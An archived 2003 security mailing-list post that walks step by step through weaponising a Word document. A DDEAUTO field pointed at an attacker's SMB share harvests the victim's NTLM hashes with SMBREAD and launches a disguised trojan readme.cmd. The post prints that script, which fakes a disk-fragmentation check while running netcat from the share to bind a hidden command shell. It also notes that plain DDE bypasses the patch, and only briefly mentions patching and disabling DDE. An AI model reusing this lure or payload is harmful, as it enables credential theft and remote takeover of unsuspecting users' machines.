All, MS office has some good hacks that can be worked into a pen test. This particular one works best inside your organization (no firewall between you and your target). All it requires is that a user open or print a word doc that you created and sent to them - or you placed somewhere they could open it, maybe on a shared HD for example. Open a new word doc. Put some text in it - Place a footer at the bottom (or you can also use the hidden text field) place the cursor somewhere in the hidden text or footer, hit ctrl-f9 (inserts a macro) Place this text into the macro [ddeauto rogman "\\\\ipaddress\\sharename\\readme.cmd"] - not including the [] The extra \ is an escape character necessary to get the real \ in the macro. Save the doc There are two opportunities to get the target machine: 1 NTLM hashes 2 your readme.cmd file When the target opens/prints the doc - before any sort of messages or warnings are given (see below why there are no macro warnings given) - the target machine will send its NT/W2K/XP credentials (authentication) to the IP address shown above. Now - if you are running SMBREAD (part of l0phtcrack) you can get their NTLM hashes before they get any messages of any sort!!! If they run NTLMv2 - no such good luck as they will send hashes that you cannot use. When they are successfully authenticated to your share name (use "everybody read" for permissions on the share) they will be prompted for the "progman" program to open the readme.cmd file on your IP address. But - they will not see your IP address. Word will pop-up a small window with text like "The remote data (readme.cmd) is not accessible. Do you want to start the application progman?". BTW - you could use a SAMBA machine running SMBREAD and point the readme.cmd there. If you name your Trojan file something like readme.cmd - they will probably open it anyway. What you place into the readme.cmd is your option but I like to use netcat with an open port like below. If they answer "yes" to the pop-up mentioned above then the file (readme.cmd) will run using their current NT authority. YMMV file is readme.cmd @echo off echo Checking to see how fragmented your C drive is... please wait start /min \\192.168.1.5\testie\nc -dLp 81 -e %comspec% echo You have no disk fragmentation problems at this time - OK. Please close this window.. end of readme.cmd MS has patches for Word 97 & W 2000 - but as in the article below they have problems - one problem is that you can use DDE or ddeauto to run the hack - and plain DDE is not trapped by the patch !! If you want some more information. -see this URL http://www.woodyswatch.com/office/archtemplate.asp?v7-n49 BTW - Woody’s office watch is an excellent source of information and humor regarding the MS office products. I figured out the DDE & DDEAUTO before I saw the above article. The macro warning is not triggered by the DDE or DDEAUTO command until the patch is applied. Also - DDE services & progman are default services/programs that exist in NT,W2K & XP There are other hacks that you can do - such as launch IE with no console attached - pointing to your XSS site !!! I have patched my Word 97 and am very careful about opening Word docs from unknown sources! I have also disabled DDE services. BTW DDE & DDEAUTO can also be used in Excel spreadsheets. I am not certain if MS has patched them. All OLE programs may use DDE services. PPT, Access, ???? Cheers __________________________________________________ Do you Yahoo!? Yahoo! Shopping - Send Flowers for Valentine's Day http://shopping.yahoo.com ---------------------------------------------------------------------------- Do you know the base address of the Global Offset Table (GOT) on a Solaris 8 box? CORE IMPACT does. www.securityfocus.com/core
This archive was generated by hypermail 2b30 : Wed Feb 19 2003 - 13:31:29 PST